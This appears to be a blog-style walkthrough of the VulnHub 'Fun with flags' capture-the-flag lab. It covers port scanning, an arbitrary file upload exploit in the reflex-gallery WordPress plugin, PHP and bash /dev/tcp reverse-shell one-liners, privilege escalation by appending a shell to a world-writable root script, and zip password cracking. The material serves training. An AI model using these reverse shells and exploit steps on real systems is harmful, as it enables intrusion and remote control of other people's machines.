TBBT: Fun with flags Walkthrough

TBBT: Funwithflags
_____ _ _ _ _ _ _____ _
| ___| | | | (_) | | | | ___| |
| |_ _ _ _ __ | | | |_| |_| |__ | |_ | | __ _ __ _ ___
| _| | | | '_ \ | |/\| | | __| '_ \ | _| | |/ _` |/ _` / __|
| | | |_| | | | | \ /\ / | |_| | | | | | | | (_| | (_| \__ \
\_| \__,_|_| |_| \/ \/|_|\__|_| |_| \_| |_|\__,_|\__, |___/
__/ |
|___/

Before putting hands on the machine I read the description of the machine on vulnhub that the machine has DHCP disabled and the IP of the machine is 192.168.1.105 so the first thing I did is, I set my Host Network Manager to IP series 192.168.1.1 and then moved towards enumeration as the IP of the machine is already described in the description.

Port Scanning

┌─[root@NITRO]─[~]
└──╼ #nmap -v -A -p- 192.168.1.105

Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-17 02:06 IST
Nmap scan report for 192.168.1.105
Host is up (0.00032s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 539 Mar 04 00:11 Welcome.txt
| -rw-r--r-- 1 ftp ftp 114 Mar 04 00:13 ftp_agreement.txt
|_drwxr-xr-x 9 ftp ftp 4096 Mar 04 00:09 pub
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.1.1
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 cf:5c:ee:76:7c:48:52:06:8d:56:07:7f:f6:5d:80:f2 (RSA)
| 256 ab:bb:fa:f9:89:99:02:9e:e4:20:fa:37:4f:6f:ca:ca (ECDSA)
|_ 256 ea:6d:77:f3:ff:9c:d5:dd:85:e3:1e:75:3c:7b:66:47 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
| http-robots.txt: 4 disallowed entries
|_/howard /web_shell.php /backdoor /rootflag.txt
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Fun with flags!
1337/tcp open waste?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NULL, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns:
|_ FLAG-sheldon{cf88b37e8cb10c4005c1f2781a069cf8}
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :.....

Here as the result is clearly saying that ftp has anonymous login enabled. I moved on ftp and started enumeration inside ftp but its that much helpful I only found few flag and hints that I have no idea of that.

Here in the result of nmap at the last port no. 1337 is saying something clearly so I just had a look at this port using telnet.

┌─[root@NITRO]─[~]
└──╼ #telnet 192.168.1.105 1337

Trying 192.168.1.105...
Connected to 192.168.1.105.
Escape character is '^]'.
FLAG-sheldon{cf88b37e8cb10c4005c1f2781a069cf8}
Connection closed by foreign host.

Here I found the Sheldon flag at this port as it is also present in the nmap result.

Moving ahead towards the web at “http://192.168.1.105/” what I found is a picture that is of the show “The Big Bang Theory”

http://funwithflags/

Here nothing interesting is available so I moved on to scan for directories that may give some help to go on.

┌─[✗]─[root@NITRO]─[~]
└──╼ #dirb http://192.168.1.105
-----------------
DIRB v2.22
By The Dark Raver
-----------------

Here I got three interesting things that are the first robots.txt file that has listing of few disallowed paths but I didn’t found them useful at this time.\

WordPress Time

As I also found that WordPress is available on the machine so I just moved on the terminal again and started scanning the WordPress using “wpscan”. I scanned plugins if available and get one which is vulnerable as well as it is out dated.

┌─[root@NITRO]─[~]
└──╼ #wpscan --url http://192.168.1.105/music/wordpress -e p

The plugin “reflex-gallery” is out dated with the version 3.1.3 so without having delay I searched for the exploit for this if any available and I got that but the exploit is a .txt file which gives the necessary detail to exploit the plugin manually.

Reference : https://www.exploit-db.com/exploits/36374

The vulnerability is of Arbitrary File Upload.

Reading the exploit and understanding it is not at all tough. I made a .html file and put the code present in the exploit and opened it with web browser.

file:///root/reflex.html

Here the directory path of the plugin is helpful to upload the shell on the web. After little bit enumeration on the directory of plugin I found php.php file which seems to be interesting as it is saying something.

http://funwithflags/music/wordpress/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php

Uploading php shell file on the web is easy just select the .php file and click on Pwn! button.

Here make sure to replace the path to the php.php file path in the html file that is “http://192.168.1.105/music/wordpress/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php” .

http://funwithflags/music/wordpress/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php

Here the php shell file get successfully uploaded on the machine and the path where the file got upload is also shown there now its time to call the shell file.

http://funwithflags/music/wordpress/wp-content/uploads/phhp.php

Here I putted a listener on at port no. 1234 and called the shell from web. I used the following command to get the reverse shell :

php -r ‘$sock=fsockopen(“192.168.1.1”,1234);exec(“/bin/bash -i <&3 >&3 2>&3”);’

Now getting the bash shell I moved further :

┌─[root@NITRO]─[~]
└──╼ #nc -nlvp 1234
listening on [any] 1234 …
connect to [192.168.1.1] from (UNKNOWN) [192.168.1.105] 59998
bash: cannot set terminal process group (1153): Inappropriate ioctl for device
bash: no job control in this shell
www-data@tbbt:/var/www/html/music/wordpress/wp-content/uploads$

With further enumeration I got few flags at different locations

www-data@tbbt:/var/ftp/pub/bernadette$ cat PENNY_README_ASAP.txt
cat PENNY_README_ASAP.txt
Penny the IT department from my Pharmaceutical company opened you an account in the B2B website.
You need to go there ASAP and learn our drugs for your interview tomorrow.
I dont remember the link, but it is easy you will find it!
Username: penny69
Password: cant post it here as sheldon said. you know the password. you use it everywhere.

While enumeration mean while I came to get a interesting file that has all permission and the file is a .sh file in the directory named “leonard”. Getting help from google for Privilege Escalation I got the way to it.

www-data@tbbt:/home/leonard$ ls -la
ls -la
total 24
drwxr-xr-x 2 leonard leonard 4096 Mar 6 00:47 .
drwxr-xr-x 10 root root 4096 Mar 4 02:33 ..
-rw — — — — 1 leonard leonard 0 Mar 6 00:47 .bash_history
-rw-r — r — 1 leonard leonard 220 Sep 1 2015 .bash_logout
-rw-r — r — 1 leonard leonard 3771 Sep 1 2015 .bashrc
-rw-r — r — 1 leonard leonard 655 May 16 2017 .profile
-rwxrwxrwx 1 root root 484 Mar 6 00:23 thermostat_set_temp.sh

I appended a command in the executable .sh file to get the shell

www-data@tbbt:/home/leonard$ echo "bash -i >& /dev/tcp/192.168.1.1/4321 0>&1" >> thermostat_set_temp.sh

In another terminal the listener is on.

┌─[✗]─[root@NITRO]─[~]
└──╼ #nc -nlvp 4321
listening on [any] 4321 …
connect to [192.168.1.1] from (UNKNOWN) [192.168.1.105] 35304
bash: cannot set terminal process group (3409): Inappropriate ioctl for device
bash: no job control in this shell
root@tbbt:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@tbbt:~# whoami
whoami
root
root@tbbt:~#

That looks pretty good. At this point I get root. Now as the description of the VM says there are total 7 Flags with out which the CTF is incomplete. So I again started Enumeration of the flags.

root@tbbt:~# cat FLAG-leonard.txt
cat FLAG-leonard.txt
____
/ \
/______\
||
/~~~~~~~~\ || /~~~~~~~~~~~~~~~~\
/~ () () ~\ || /~ () () () () ~\
(_)========(_) || (_)==== ===========(_)
I|_________|I _||_ |___________________|
.////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

The another flag found.

root@tbbt:/var/www/html/private# cat db_config.php
cat db_config.php
<?php
// Create connection
$DBUSER = 'bigpharmacorp';
$DBPASS = 'weareevil';

After few enumeration I got the credentials of phpmyadmin and mysql database.

root@tbbt:/var/www/html/private# mysql -u bigpharmacorp -p
mysql -u bigpharmacorp -p
Enter password: weareevil

One more flag found. Again using the credentials that I found in the wp-config.php file I logged in to the mysql and enumerated the next flag.

FLAG-raz{40d17a74e28a62eac2df19e206f0987c}

Now the one and the last flag that is missing for which I started enumerating form the very first where I came near a file named super_secret_nasa_stuff_here.zip that I already download I tried to unzip it earlier but the file is password protected so for this I googled the way to brute-force it any how and I got the tool to do so.

┌─[root@NITRO]─[~]
└──╼ #fcrackzip -D -p /usr/share/wordlists/rockyou.txt super_secret_nasa_stuff_here.zip -u

Here I got all 7 flags as well as root of the machine. Well as the machine name saying “Fun with flags”, there is too much fun in finding the flags. I came around few new concepts mean while solving and fining the flags and clear that concepts too.